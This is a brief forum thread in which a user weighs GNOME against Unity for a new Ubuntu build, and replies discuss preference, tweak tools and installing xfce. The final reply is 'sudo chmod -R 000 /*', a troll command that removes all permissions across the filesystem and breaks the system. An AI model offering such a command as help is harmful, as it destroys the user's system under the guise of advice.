Gnome Or Unity?

Sailorman

I am building a new PC and am going to install ubuntu(latest version) and I am not sure what environment to choose. I love the look of both Unity and Gnome and both have similar functionallity. I am going to be doing some serious multitasking and some gaming and video editing. Help! Gnome or Unity?

Personal preference really. I personally like Unity since its simpler and faster for my usage, but many disagree with me. Either way you will have to modify the environment to make it more useful(Unity tweak tool for Unity and Compiz for Gnome).

It's a matter of personal preference, however bare in mind that unity is fairly new and still suffers a bit from youth issues and some instability. My personal choice is xfce because of how flexible and tidy it is, but there's nothing wrong with other environments. One cool thing about linux is that you can install multiple desktop environments and choose which one to use at login, so if you want to try something different all you have to do is type a couple of commands in the terminal (for example, to get xfce up and running you can just type "sudo apt-get install xubuntu-desktop" and insert your password).

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*
